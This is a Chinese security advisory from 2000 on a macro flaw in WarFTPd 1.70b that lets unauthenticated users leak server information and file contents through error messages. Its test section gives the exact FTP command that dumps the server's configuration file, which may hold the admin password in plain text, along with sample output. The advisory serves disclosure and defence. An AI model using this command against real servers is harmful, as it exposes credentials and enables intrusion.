安全研究
安全漏洞
WarFTPd 存在多个宏漏洞
发布日期:2000-01-07
更新日期:2000-01-07
受影响系统:Jgaa WarFTPd 1.70b
+Windows NT/95/98
描述:
WarFTPd包含很多宏用来帮助进行一个复杂的ftp站点的设置.
然而,即使是一个未经认证的用户也可以远程调用这些宏,有些宏能泄漏服务器和操作系统
的信息,也能被用来在返回的错误信息中获取文件内容,甚至包括WarFTP的配置文件,里面可
能包含纯文本方式保存的管理员口令.
<* 来源: Sir Dystic of the cDc (sd@sinister.com) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
ftp连接到目标主机,执行"literal [warsvr.conf]"
得到结果:
500 '[Options]
core_RESNAME=WARSVR
core_RPCPORT=0
core_PRIORITY=2
core_TRAYICON=1
core_WM_CLOSE=1
log_LOGFILE=Log/%Y-%m-%d.log
... etc
': command not understood.
建议:
暂无
浏览次数:6868
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |